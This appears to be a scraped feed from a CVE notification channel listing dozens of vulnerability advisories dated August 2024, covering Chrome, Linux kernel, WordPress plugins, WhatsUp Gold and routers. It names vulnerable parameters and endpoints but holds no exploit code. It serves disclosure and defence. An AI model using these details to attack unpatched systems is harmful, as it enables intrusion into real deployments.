🚨 CVE-2024-1939Type Confusion in V8 in Google Chrome prior to 122.0.6261.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-08-27 21:37:26 |
🚨 CVE-2023-47132An issue discovered in N-able N-central before 2023.6 and earlier allows attackers to gain escalated privileges via API calls.🎖@cveNotify |
|
| 2024-08-27 21:37:25 |
🚨 CVE-2018-16310Technicolor TG588V V2 devices allow remote attackers to cause a denial of service (networking outage) via a flood of random MAC addresses, as demonstrated by macof. NOTE: this might overlap CVE-2018-15852 and CVE-2018-15907. NOTE: Technicolor denies that the described behavior is a vulnerability and states that Wi-Fi traffic is slowed or stopped only while the devices are exposed to a MAC flooding attack. This has been confirmed through testing against official up-to-date versions🎖@cveNotify |
|
| 2024-08-27 20:37:32 |
🚨 CVE-2024-26471A reflected cross-site scripting (XSS) vulnerability in zhimengzhe iBarn v1.5 allows attackers to inject malicious JavaScript into the web browser of a victim via the search parameter in offer.php.🎖@cveNotify |
|
| 2024-08-27 20:37:26 |
🚨 CVE-2024-23052An issue in WuKongOpenSource WukongCRM v.72crm_9.0.1_20191202 allows a remote attacker to execute arbitrary code via the parseObject() function in the fastjson component.🎖@cveNotify |
|
| 2024-08-27 20:37:25 |
🚨 CVE-2023-52160The implementation of PEAP in wpa_supplicant through 2.10 allows authentication bypass. For a successful attack, wpa_supplicant must be configured to not verify the network's TLS certificate during Phase 1 authentication, and an eap_peap_decrypt vulnerability can then be abused to skip Phase 2 authentication. The attack vector is sending an EAP-TLV Success packet instead of starting Phase 2. This allows an adversary to impersonate Enterprise Wi-Fi networks.🎖@cveNotify |
|
| 2024-08-27 20:37:24 |
🚨 CVE-2023-51015TOTOLINX EX1800T v9.1.0cu.2112_B20220316 is vulnerable to arbitrary command execution in the ‘enable parameter’ of the setDmzCfg interface of the cstecgi .cgi🎖@cveNotify |
|
| 2024-08-27 20:07:31 |
🚨 CVE-2024-38549In the Linux kernel, the following vulnerability has been resolved:drm/mediatek: Add 0 size check to mtk_drm_gem_objAdd a check to mtk_drm_gem_init if we attempt to allocate a GEM objectof 0 bytes. Currently, no such check exists and the kernel will panic ifa userspace application attempts to allocate a 0x0 GBM buffer.Tested by attempting to allocate a 0x0 GBM buffer on an MT8188 andverifying that we now return EINVAL.🎖@cveNotify |
|
| 2024-08-27 20:07:30 |
🚨 CVE-2024-38546In the Linux kernel, the following vulnerability has been resolved:drm: vc4: Fix possible null pointer dereferenceIn vc4_hdmi_audio_init() of_get_address() may returnNULL which is later dereferenced. Fix this bug by adding NULL check.Found by Linux Verification Center (linuxtesting.org) with SVACE.🎖@cveNotify |
|
| 2024-08-27 20:07:26 |
🚨 CVE-2023-32247A flaw was found in the Linux kernel's ksmbd, a high-performance in-kernel SMB server. The specific flaw exists within the handling of SMB2_SESSION_SETUP commands. The issue results from the lack of control of resource consumption. An attacker can leverage this vulnerability to create a denial-of-service condition on the system.🎖@cveNotify |
|
| 2024-08-27 20:07:25 |
🚨 CVE-2019-19064A memory leak in the fsl_lpspi_probe() function in drivers/spi/spi-fsl-lpspi.c in the Linux kernel through 5.3.11 allows attackers to cause a denial of service (memory consumption) by triggering pm_runtime_get_sync() failures, aka CID-057b8945f78f. NOTE: third parties dispute the relevance of this because an attacker cannot realistically control these failures at probe time🎖@cveNotify |
|
| 2024-08-27 19:37:26 |
🚨 CVE-2023-47678An improper access control vulnerability exists in RT-AC87U all versions. An attacker may read or write files that are not intended to be accessed by connecting to a target device via tftp.🎖@cveNotify |
|
| 2024-08-27 19:37:25 |
🚨 CVE-2023-32252A flaw was found in the Linux kernel's ksmbd, a high-performance in-kernel SMB server. The specific flaw exists within the handling of SMB2_LOGOFF commands. The issue results from the lack of proper validation of a pointer prior to accessing it. An attacker can leverage this vulnerability to create a denial-of-service condition on the system.🎖@cveNotify |
|
| 2024-08-27 19:07:25 |
🚨 CVE-2023-38427An issue was discovered in the Linux kernel before 6.3.8. fs/smb/server/smb2pdu.c in ksmbd has an integer underflow and out-of-bounds read in deassemble_neg_contexts.🎖@cveNotify |
|
| 2024-08-27 19:07:24 |
🚨 CVE-2019-19049A memory leak in the unittest_data_add() function in drivers/of/unittest.c in the Linux kernel before 5.3.10 allows attackers to cause a denial of service (memory consumption) by triggering of_fdt_unflatten_tree() failures, aka CID-e13de8fe0d6a. NOTE: third parties dispute the relevance of this because unittest.c can only be reached during boot🎖@cveNotify |
|
| 2024-08-27 18:37:25 |
🚨 CVE-2024-0258The issue was addressed with improved memory handling. This issue is fixed in tvOS 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4, watchOS 10.4. An app may be able to execute arbitrary code out of its sandbox or with certain elevated privileges.🎖@cveNotify |
|
| 2024-08-27 18:37:24 |
🚨 CVE-2022-34269An issue was discovered in RWS WorldServer before 11.7.3. An authenticated, remote attacker can perform a ws-legacy/load_dtd?system_id= blind SSRF attack to deploy JSP code to the Apache Axis service running on the localhost interface, leading to command execution.🎖@cveNotify |
|
| 2024-08-27 18:07:43 |
🚨 CVE-2024-37371In MIT Kerberos 5 (aka krb5) before 1.21.3, an attacker can cause invalid memory reads during GSS message token handling by sending message tokens with invalid length fields.🎖@cveNotify |
|
| 2024-08-27 18:07:42 |
🚨 CVE-2022-29847In Progress Ipswitch WhatsUp Gold 21.0.0 through 21.1.1, and 22.0.0, it is possible for an unauthenticated attacker to invoke an API transaction that would allow them to relay encrypted WhatsUp Gold user credentials to an arbitrary host.🎖@cveNotify |
|
| 2024-08-27 18:07:38 |
🚨 CVE-2022-29845In Progress Ipswitch WhatsUp Gold 21.1.0 through 21.1.1, and 22.0.0, it is possible for an authenticated user to invoke an API transaction that would allow them to read the contents of a local file.🎖@cveNotify |
|
| 2024-08-27 18:07:37 |
🚨 CVE-2018-8938A Code Injection issue was discovered in DlgSelectMibFile.asp in Ipswitch WhatsUp Gold before 2018 (18.0). Malicious actors can inject a specially crafted SNMP MIB file that could allow them to execute arbitrary commands and code on the WhatsUp Gold server.🎖@cveNotify |
|
| 2024-08-27 18:07:36 |
🚨 CVE-2018-5778An issue was discovered in Ipswitch WhatsUp Gold before 2017 Plus SP1 (17.1.1). Multiple SQL injection vulnerabilities are present in the legacy .ASP pages, which could allow attackers to execute arbitrary SQL commands via unspecified vectors.🎖@cveNotify |
|
| 2024-08-27 18:07:33 |
🚨 CVE-2018-5777An issue was discovered in Ipswitch WhatsUp Gold before 2017 Plus SP1 (17.1.1). Remote clients can take advantage of a misconfiguration in the TFTP server that could allow attackers to execute arbitrary commands on the TFTP server via unspecified vectors.🎖@cveNotify |
|
| 2024-08-27 18:07:32 |
🚨 CVE-2015-8261The DroneDeleteOldMeasurements implementation in Ipswitch WhatsUp Gold before 16.4 does not properly validate serialized XML objects, which allows remote attackers to conduct SQL injection attacks via a crafted SOAP request.🎖@cveNotify |
|
| 2024-08-27 18:07:31 |
🚨 CVE-2015-6004Multiple SQL injection vulnerabilities in IPSwitch WhatsUp Gold before 16.4 allow remote attackers to execute arbitrary SQL commands via (1) the UniqueID (aka sUniqueID) parameter to WrFreeFormText.asp in the Reports component or (2) the Find Device parameter.🎖@cveNotify |
|
| 2024-08-27 18:07:27 |
🚨 CVE-2012-2601SQL injection vulnerability in WrVMwareHostList.asp in Ipswitch WhatsUp Gold 15.02 allows remote attackers to execute arbitrary SQL commands via the sGroupList parameter.🎖@cveNotify |
|
| 2024-08-27 18:07:26 |
🚨 CVE-2004-0799The HTTP daemon in Ipswitch WhatsUp Gold 8.03 and 8.03 Hotfix 1 allows remote attackers to cause a denial of service (server crash) via a GET request containing an MS-DOS device name, as demonstrated using "prn.htm".🎖@cveNotify |
|
| 2024-08-27 18:07:25 |
🚨 CVE-2004-0798Buffer overflow in the _maincfgret.cgi script for Ipswitch WhatsUp Gold before 8.03 Hotfix 1 allows remote attackers to execute arbitrary code via a long instancename parameter.🎖@cveNotify |
|
| 2024-08-27 16:37:33 |
🚨 CVE-2024-21896The permission model protects itself against path traversal attacks by calling path.resolve() on any paths given by the user. If the path is to be treated as a Buffer, the implementation uses Buffer.from() to obtain a Buffer from the result of path.resolve(). By monkey-patching Buffer internals, namely, Buffer.prototype.utf8Write, the application can modify the result of path.resolve(), which leads to a path traversal vulnerability.This vulnerability affects all users using the experimental permission model in Node.js 20 and Node.js 21.Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.🎖@cveNotify |
|
| 2024-08-27 16:37:26 |
🚨 CVE-2023-52105The nearby module has a privilege escalation vulnerability. Successful exploitation of this vulnerability may affect availability.🎖@cveNotify |
|
| 2024-08-27 16:37:25 |
🚨 CVE-2023-5880When the Genie Company Aladdin Connect garage door opener (Retrofit-Kit Model ALDCM) is placed into configuration mode the web servers “Garage Door Control Module Setup” page is vulnerable to XSS via a broadcast SSID name containing malicious code with client side Java Script and/or HTML. This allows the attacker to inject malicious code with client side Java Script and/or HTML into the users' web browser.🎖@cveNotify |
|
| 2024-08-27 16:07:25 |
🚨 CVE-2024-38600In the Linux kernel, the following vulnerability has been resolved:ALSA: Fix deadlocks with kctl removals at disconnectionIn snd_card_disconnect(), we set card->shutdown flag at the beginning,call callbacks and do sync for card->power_ref_sleep waiters at theend. The callback may delete a kctl element, and this can lead to adeadlock when the device was in the suspended state. Namely:* A process waits for the power up at snd_power_ref_and_wait() in snd_ctl_info() or read/write() inside card->controls_rwsem.* The system gets disconnected meanwhile, and the driver tries to delete a kctl via snd_ctl_remove*(); it tries to take card->controls_rwsem again, but this is already locked by the above. Since the sleeper isn't woken up, this deadlocks.An easy fix is to wake up sleepers before processing the driverdisconnect callbacks but right after setting the card->shutdown flag.Then all sleepers will abort immediately, and the code flows again.So, basically this patch moves the wait_event() call at the righttiming. While we're at it, just to be sure, call wait_event_all()instead of wait_event(), although we don't use exclusive events onthis queue for now.🎖@cveNotify |
|
| 2024-08-27 15:37:44 |
🚨 CVE-2024-34048O-RAN RIC I-Release e2mgr lacks array size checks in E2nodeConfigUpdateNotificationHandler.🎖@cveNotify |
|
| 2024-08-27 15:37:37 |
🚨 CVE-2024-30569An information leak in currentsetting.htm of Netgear R6850 v1.1.0.88 allows attackers to obtain sensitive information without any authentication required.🎖@cveNotify |
|
| 2024-08-27 15:37:36 |
🚨 CVE-2024-27236In aoc_unlocked_ioctl of aoc.c, there is a possible memory corruption due to type confusion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-08-27 15:37:32 |
🚨 CVE-2024-27208there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-08-27 15:37:31 |
🚨 CVE-2023-52457In the Linux kernel, the following vulnerability has been resolved:serial: 8250: omap: Don't skip resource freeing if pm_runtime_resume_and_get() failedReturning an error code from .remove() makes the driver core emit thelittle helpful error message: remove callback returned a non-zero value. This will be ignored.and then remove the device anyhow. So all resources that were not freedare leaked in this case. Skipping serial8250_unregister_port() has thepotential to keep enough of the UART around to trigger a use-after-free.So replace the error return (and with it the little helpful errormessage) by a more useful error message and continue to cleanup.🎖@cveNotify |
|
| 2024-08-27 15:37:27 |
🚨 CVE-2023-6040An out-of-bounds access vulnerability involving netfilter was reported and fixed as: f1082dd31fe4 (netfilter: nf_tables: Reject tables of unsupported family); While creating a new netfilter table, lack of a safeguard against invalid nf_tables family (pf) values within `nf_tables_newtable` function enables an attacker to achieve out-of-bounds access.🎖@cveNotify |
|
| 2024-08-27 15:37:26 |
🚨 CVE-2023-5717A heap out-of-bounds write vulnerability in the Linux kernel's Linux Kernel Performance Events (perf) component can be exploited to achieve local privilege escalation.If perf_read_group() is called while an event's sibling_list is smaller than its child's sibling_list, it can increment or write to memory locations outside of the allocated buffer.We recommend upgrading past commit 32671e3799ca2e4590773fd0e63aaa4229e50c06.🎖@cveNotify |
|
| 2024-08-27 15:37:25 |
🚨 CVE-2023-5345A use-after-free vulnerability in the Linux kernel's fs/smb/client component can be exploited to achieve local privilege escalation.In case of an error in smb3_fs_context_parse_param, ctx->password was freed but the field was not set to NULL which could lead to double free.We recommend upgrading past commit e6e43b8aa7cd3c3af686caf0c2e11819a886d705.🎖@cveNotify |
|
| 2024-08-27 15:07:25 |
🚨 CVE-2024-0646An out-of-bounds memory write flaw was found in the Linux kernel’s Transport Layer Security functionality in how a user calls a function splice with a ktls socket as the destination. This flaw allows a local user to crash or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2024-08-27 15:07:24 |
🚨 CVE-2024-0562A use-after-free flaw was found in the Linux Kernel. When a disk is removed, bdi_unregister is called to stop further write-back and waits for associated delayed work to complete. However, wb_inode_writeback_end() may schedule bandwidth estimation work after this has completed, which can result in the timer attempting to access the recently freed bdi_writeback.🎖@cveNotify |
|
| 2024-08-27 14:37:25 |
🚨 CVE-2018-13492The mintToken function of a smart contract implementation for naga, an Ethereum token, has an integer overflow that allows the owner of the contract to set the balance of an arbitrary user to any value.🎖@cveNotify |
|
| 2024-08-27 14:07:42 |
🚨 CVE-2024-43909In the Linux kernel, the following vulnerability has been resolved:drm/amdgpu/pm: Fix the null pointer dereference for smu7optimize the code to avoid pass a null pointer (hwmgr->backend)to function smu7_update_edc_leakage_table.🎖@cveNotify |
|
| 2024-08-27 14:07:38 |
🚨 CVE-2024-43907In the Linux kernel, the following vulnerability has been resolved:drm/amdgpu/pm: Fix the null pointer dereference in apply_state_adjust_rulesCheck the pointer value to fix potential null pointerdereference🎖@cveNotify |
|
| 2024-08-27 14:07:37 |
🚨 CVE-2024-43905In the Linux kernel, the following vulnerability has been resolved:drm/amd/pm: Fix the null pointer dereference for vega10_hwmgrCheck return value and conduct null pointer handling to avoid null pointer dereference.🎖@cveNotify |
|
| 2024-08-27 14:07:36 |
🚨 CVE-2024-43904In the Linux kernel, the following vulnerability has been resolved:drm/amd/display: Add null checks for 'stream' and 'plane' before dereferencingThis commit adds null checks for the 'stream' and 'plane' variables inthe dcn30_apply_idle_power_optimizations function. These variables werepreviously assumed to be null at line 922, but they were used later inthe code without checking if they were null. This could potentially leadto a null pointer dereference, which would cause a crash.The null checks ensure that 'stream' and 'plane' are not null beforethey are used, preventing potential crashes.Fixes the below static smatch checker:drivers/gpu/drm/amd/amdgpu/../display/dc/hwss/dcn30/dcn30_hwseq.c:938 dcn30_apply_idle_power_optimizations() error: we previously assumed 'stream' could be null (see line 922)drivers/gpu/drm/amd/amdgpu/../display/dc/hwss/dcn30/dcn30_hwseq.c:940 dcn30_apply_idle_power_optimizations() error: we previously assumed 'plane' could be null (see line 922)🎖@cveNotify |
|
| 2024-08-27 14:07:33 |
🚨 CVE-2024-43903In the Linux kernel, the following vulnerability has been resolved:drm/amd/display: Add NULL check for 'afb' before dereferencing in amdgpu_dm_plane_handle_cursor_updateThis commit adds a null check for the 'afb' variable in theamdgpu_dm_plane_handle_cursor_update function. Previously, 'afb' wasassumed to be null, but was used later in the code without a null check.This could potentially lead to a null pointer dereference.Fixes the below:drivers/gpu/drm/amd/amdgpu/../display/amdgpu_dm/amdgpu_dm_plane.c:1298 amdgpu_dm_plane_handle_cursor_update() error: we previously assumed 'afb' could be null (see line 1252)🎖@cveNotify |
|
| 2024-08-27 14:07:32 |
🚨 CVE-2024-42094In the Linux kernel, the following vulnerability has been resolved:net/iucv: Avoid explicit cpumask var allocation on stackFor CONFIG_CPUMASK_OFFSTACK=y kernel, explicit allocation of cpumaskvariable on stack is not recommended since it can cause potential stackoverflow.Instead, kernel code should always use *cpumask_var API(s) to allocatecpumask var in config-neutral way, leaving allocation strategy toCONFIG_CPUMASK_OFFSTACK.Use *cpumask_var API(s) to address it.🎖@cveNotify |
|
| 2024-08-27 14:07:31 |
🚨 CVE-2024-40897Stack-based buffer overflow vulnerability exists in orcparse.c of ORC versions prior to 0.4.39. If a developer is tricked to process a specially crafted file with the affected ORC compiler, an arbitrary code may be executed on the developer's build environment. This may lead to compromise of developer machines or CI build environments.🎖@cveNotify |
|
| 2024-08-27 13:37:49 |
🚨 CVE-2024-4872The product does not validate any query towards persistentdata, resulting in a risk of injection attacks.🎖@cveNotify |
|
| 2024-08-27 13:37:48 |
🚨 CVE-2024-3980The product allows user input to control or influence paths or filenames that are used in filesystem operations, allowing the attacker to access or modify system files or other files that arecritical to the application.🎖@cveNotify |
|
| 2024-08-27 13:37:47 |
🚨 CVE-2024-5466Zohocorp ManageEngine OpManager and Remote Monitoring and Management versions 128329 and below are vulnerable to the authenticated remote code execution in the deploy agent option.🎖@cveNotify |
|
| 2024-08-27 13:37:44 |
🚨 CVE-2024-36517Zohocorp ManageEngine ADAudit Plus versions below 8000 are vulnerable to the authenticated SQL injection in alerts module.🎖@cveNotify |
|
| 2024-08-27 13:37:43 |
🚨 CVE-2024-36516Zohocorp ManageEngine ADAudit Plus versions below 8000 are vulnerable to the authenticated SQL injection in dashboard.Note: This vulnerability is different from another vulnerability (CVE-2024-36515), both of which have affected ADAudit Plus' dashboard.🎖@cveNotify |
|
| 2024-08-27 13:07:52 |
🚨 CVE-2024-43230Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Shared Files – File Upload Form Shared Files.This issue affects Shared Files: from n/a through 1.7.28.🎖@cveNotify |
|
| 2024-08-27 13:07:51 |
🚨 CVE-2024-43117Cross-Site Request Forgery (CSRF) vulnerability in WPMU DEV Hummingbird.This issue affects Hummingbird: from n/a through 3.9.1.🎖@cveNotify |
|
| 2024-08-27 13:07:50 |
🚨 CVE-2024-43116Cross-Site Request Forgery (CSRF) vulnerability in 10up Simple Local Avatars.This issue affects Simple Local Avatars: from n/a through 2.7.10.🎖@cveNotify |
|
| 2024-08-27 13:07:46 |
🚨 CVE-2024-39645Cross-Site Request Forgery (CSRF) vulnerability in Themeum Tutor LMS.This issue affects Tutor LMS: from n/a through 2.7.2.🎖@cveNotify |
|
| 2024-08-27 13:07:45 |
🚨 CVE-2024-39628Cross-Site Request Forgery (CSRF) vulnerability in Saturday Drive Ninja Forms.This issue affects Ninja Forms: from n/a through 3.8.6.🎖@cveNotify |
|
| 2024-08-27 13:07:44 |
🚨 CVE-2024-8105A vulnerability related to the use an insecure Platform Key (PK) has been discovered. An attacker with the compromised PK private key can create malicious UEFI software that is signed with a trusted key that has been compromised.🎖@cveNotify |
|
| 2024-08-27 13:07:40 |
🚨 CVE-2024-44796A cross-site scripting (XSS) vulnerability in the component /auth/AzureRedirect.php of PicUploader commit fcf82ea allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the error_description parameter.🎖@cveNotify |
|
| 2024-08-27 13:07:39 |
🚨 CVE-2024-44794A cross-site scripting (XSS) vulnerability in the component /master/auth/OnedriveRedirect.php of PicUploader commit fcf82ea allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the error_description parameter.🎖@cveNotify |
|
| 2024-08-27 13:07:38 |
🚨 CVE-2024-44793A cross-site scripting (XSS) vulnerability in the component /managers/multiple_freeleech.php of Gazelle commit 63b3370 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the torrents parameter.🎖@cveNotify |
|
| 2024-08-27 13:07:35 |
🚨 CVE-2024-42906TestLink before v.1.9.20 is vulnerable to Cross Site Scripting (XSS) via the pop-up on upload file. When uploading a file, the XSS payload can be entered into the file name.🎖@cveNotify |
|
| 2024-08-27 13:07:34 |
🚨 CVE-2024-43806Rustix is a set of safe Rust bindings to POSIX-ish APIs. When using `rustix::fs::Dir` using the `linux_raw` backend, it's possible for the iterator to "get stuck" when an IO error is encountered. Combined with a memory over-allocation issue in `rustix::fs::Dir::read_more`, this can cause quick and unbounded memory explosion (gigabytes in a few seconds if used on a hot path) and eventually lead to an OOM crash of the application. The symptoms were initially discovered in https://github.com/imsnif/bandwhich/issues/284. That post has lots of details of our investigation. Full details can be read on the GHSA-c827-hfw6-qwvm repo advisory. If a program tries to access a directory with its file descriptor after the file has been unlinked (or any other action that leaves the `Dir` iterator in the stuck state), and the implementation does not break after seeing an error, it can cause a memory explosion. As an example, Linux's various virtual file systems (e.g. `/proc`, `/sys`) can contain directories that spontaneously pop in and out of existence. Attempting to iterate over them using `rustix::fs::Dir` directly or indirectly (e.g. with the `procfs` crate) can trigger this fault condition if the implementation decides to continue on errors. An attacker knowledgeable about the implementation details of a vulnerable target can therefore try to trigger this fault condition via any one or a combination of several available APIs. If successful, the application host will quickly run out of memory, after which the application will likely be terminated by an OOM killer, leading to denial of service. This issue has been addressed in release versions 0.35.15, 0.36.16, 0.37.25, and 0.38.19. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2024-08-27 13:07:33 |
🚨 CVE-2024-8166A vulnerability has been found in Ruijie EG2000K 11.1(6)B2 and classified as critical. This vulnerability affects unknown code of the file /tool/index.php?c=download&a=save. The manipulation of the argument content leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-27 11:37:31 |
🚨 CVE-2024-8197The Visual Sound plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.03. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-08-27 11:37:30 |
🚨 CVE-2024-7791The 140+ Widgets | Xpro Addons For Elementor – FREE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘arrow’ parameter within the Post Grid widget in all versions up to, and including, 1.4.4.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-27 11:37:26 |
🚨 CVE-2024-6124Reflected XSS in M-Files Hubshare before version 5.0.6.0 allows an attacker to execute arbitrary JavaScript code in the context of the victim's browser session🎖@cveNotify |
|
| 2024-08-27 11:37:25 |
🚨 CVE-2024-0563Denial of service condition in M-Files Server in versions before 24.2 (excluding 23.2 SR7 and 23.8 SR5) allows anonymous user to cause denial of service against other anonymous users.🎖@cveNotify |
|
| 2024-08-27 10:37:24 |
🚨 CVE-2024-6789A path traversal issue in API endpoint in M-Files Server before version 24.8.13981.0 allows authenticated user to read files🎖@cveNotify |
|
| 2024-08-27 09:37:25 |
🚨 CVE-2024-6379A reflected Cross-site Scripting (XSS) vulnerability affecting 3DSwymer from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2024x allows an attacker to execute arbitrary script code in user's browser session.🎖@cveNotify |
|
| 2024-08-27 09:37:24 |
🚨 CVE-2023-6190Improper Input Validation vulnerability in İzmir Katip Çelebi University University Information Management System allows Absolute Path Traversal.This issue affects University Information Management System: before 30.11.2023.🎖@cveNotify |
|
| 2024-08-27 08:37:32 |
🚨 CVE-2024-7608An authenticated user can download sensitive files from Trellix products NX, EX, FX, AX, IVX, and CMS using path traversal for the URL of network anomaly download_artifact.🎖@cveNotify |
|
| 2024-08-27 08:37:26 |
🚨 CVE-2024-41176The MPD package included in TwinCAT/BSD allows an authenticated, low-privileged localattacker to induce a Denial-of-Service (DoS) condition on the daemon and execute code inthe context of user “root” via a crafted HTTP request.🎖@cveNotify |
|
| 2024-08-27 08:37:25 |
🚨 CVE-2024-41173The IPC-Diagnostics package included in TwinCAT/BSD is vulnerable to a local authentication bypass by a low privileged attacker.🎖@cveNotify |
|
| 2024-08-27 08:37:24 |
🚨 CVE-2024-6377An URL redirection to untrusted site (open redirect) vulnerability affecting 3DPassport in 3DSwymer from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2024x allows an attacker to redirect users to an arbitrary website via a crafted URL.🎖@cveNotify |
|
| 2024-08-27 07:37:25 |
🚨 CVE-2024-3375Incorrect Permission Assignment for Critical Resource vulnerability in Havelsan Inc. Dialogue allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Dialogue: from v1.83 before v1.83.1 or v1.84.🎖@cveNotify |
|
| 2024-08-27 05:37:25 |
🚨 CVE-2024-7125Authentication Bypass vulnerability in Hitachi Ops Center Common Services.This issue affects Hitachi Ops Center Common Services: from 10.9.3-00 before 11.0.2-01.🎖@cveNotify |
|
| 2024-08-27 05:37:24 |
🚨 CVE-2024-6688The Oxygen Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the oxy_save_css_from_admin AJAX action in all versions up to, and including, 4.8.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update stylesheets.🎖@cveNotify |
|
| 2024-08-27 04:37:24 |
🚨 CVE-2024-45321The App::cpanminus package through 1.7047 for Perl downloads code via insecure HTTP, enabling code execution for network attackers.🎖@cveNotify |
|
| 2024-08-27 03:37:25 |
🚨 CVE-2021-47589In the Linux kernel, the following vulnerability has been resolved:igbvf: fix double free in `igbvf_probe`In `igbvf_probe`, if register_netdev() fails, the program will go tolabel err_hw_init, and then to label err_ioremap. In free_netdev() whichis just below label err_ioremap, there is `list_for_each_entry_safe` and`netif_napi_del` which aims to delete all entries in `dev->napi_list`.The program has added an entry `adapter->rx_ring->napi` which is added by`netif_napi_add` in igbvf_alloc_queues(). However, adapter->rx_ring hasbeen freed below label err_hw_init. So this a UAF.In terms of how to patch the problem, we can refer to igbvf_remove() anddelete the entry before `adapter->rx_ring`.The KASAN logs are as follows:[ 35.126075] BUG: KASAN: use-after-free in free_netdev+0x1fd/0x450[ 35.127170] Read of size 8 at addr ffff88810126d990 by task modprobe/366[ 35.128360][ 35.128643] CPU: 1 PID: 366 Comm: modprobe Not tainted 5.15.0-rc2+ #14[ 35.129789] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014[ 35.131749] Call Trace:[ 35.132199] dump_stack_lvl+0x59/0x7b[ 35.132865] print_address_description+0x7c/0x3b0[ 35.133707] ? free_netdev+0x1fd/0x450[ 35.134378] __kasan_report+0x160/0x1c0[ 35.135063] ? free_netdev+0x1fd/0x450[ 35.135738] kasan_report+0x4b/0x70[ 35.136367] free_netdev+0x1fd/0x450[ 35.137006] igbvf_probe+0x121d/0x1a10 [igbvf][ 35.137808] ? igbvf_vlan_rx_add_vid+0x100/0x100 [igbvf][ 35.138751] local_pci_probe+0x13c/0x1f0[ 35.139461] pci_device_probe+0x37e/0x6c0[ 35.165526][ 35.165806] Allocated by task 366:[ 35.166414] ____kasan_kmalloc+0xc4/0xf0[ 35.167117] foo_kmem_cache_alloc_trace+0x3c/0x50 [igbvf][ 35.168078] igbvf_probe+0x9c5/0x1a10 [igbvf][ 35.168866] local_pci_probe+0x13c/0x1f0[ 35.169565] pci_device_probe+0x37e/0x6c0[ 35.179713][ 35.179993] Freed by task 366:[ 35.180539] kasan_set_track+0x4c/0x80[ 35.181211] kasan_set_free_info+0x1f/0x40[ 35.181942] ____kasan_slab_free+0x103/0x140[ 35.182703] kfree+0xe3/0x250[ 35.183239] igbvf_probe+0x1173/0x1a10 [igbvf][ 35.184040] local_pci_probe+0x13c/0x1f0🎖@cveNotify |
|
| 2024-08-27 03:37:24 |
🚨 CVE-2021-47578In the Linux kernel, the following vulnerability has been resolved:scsi: scsi_debug: Don't call kcalloc() if size arg is zeroIf the size arg to kcalloc() is zero, it returns ZERO_SIZE_PTR. Because ofthat, for a following NULL pointer check to work on the returned pointer,kcalloc() must not be called with the size arg equal to zero. Return earlywithout error before the kcalloc() call if size arg is zero.BUG: KASAN: null-ptr-deref in memcpy include/linux/fortify-string.h:191 [inline]BUG: KASAN: null-ptr-deref in sg_copy_buffer+0x138/0x240 lib/scatterlist.c:974Write of size 4 at addr 0000000000000010 by task syz-executor.1/22789CPU: 1 PID: 22789 Comm: syz-executor.1 Not tainted 5.15.0-syzk #1Hardware name: Red Hat KVM, BIOS 1.13.0-2Call Trace: __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x89/0xb5 lib/dump_stack.c:106 __kasan_report mm/kasan/report.c:446 [inline] kasan_report.cold.14+0x112/0x117 mm/kasan/report.c:459 check_region_inline mm/kasan/generic.c:183 [inline] kasan_check_range+0x1a3/0x210 mm/kasan/generic.c:189 memcpy+0x3b/0x60 mm/kasan/shadow.c:66 memcpy include/linux/fortify-string.h:191 [inline] sg_copy_buffer+0x138/0x240 lib/scatterlist.c:974 do_dout_fetch drivers/scsi/scsi_debug.c:2954 [inline] do_dout_fetch drivers/scsi/scsi_debug.c:2946 [inline] resp_verify+0x49e/0x930 drivers/scsi/scsi_debug.c:4276 schedule_resp+0x4d8/0x1a70 drivers/scsi/scsi_debug.c:5478 scsi_debug_queuecommand+0x8c9/0x1ec0 drivers/scsi/scsi_debug.c:7533 scsi_dispatch_cmd drivers/scsi/scsi_lib.c:1520 [inline] scsi_queue_rq+0x16b0/0x2d40 drivers/scsi/scsi_lib.c:1699 blk_mq_dispatch_rq_list+0xb9b/0x2700 block/blk-mq.c:1639 __blk_mq_sched_dispatch_requests+0x28f/0x590 block/blk-mq-sched.c:325 blk_mq_sched_dispatch_requests+0x105/0x190 block/blk-mq-sched.c:358 __blk_mq_run_hw_queue+0xe5/0x150 block/blk-mq.c:1761 __blk_mq_delay_run_hw_queue+0x4f8/0x5c0 block/blk-mq.c:1838 blk_mq_run_hw_queue+0x18d/0x350 block/blk-mq.c:1891 blk_mq_sched_insert_request+0x3db/0x4e0 block/blk-mq-sched.c:474 blk_execute_rq_nowait+0x16b/0x1c0 block/blk-exec.c:62 blk_execute_rq+0xdb/0x360 block/blk-exec.c:102 sg_scsi_ioctl drivers/scsi/scsi_ioctl.c:621 [inline] scsi_ioctl+0x8bb/0x15c0 drivers/scsi/scsi_ioctl.c:930 sg_ioctl_common+0x172d/0x2710 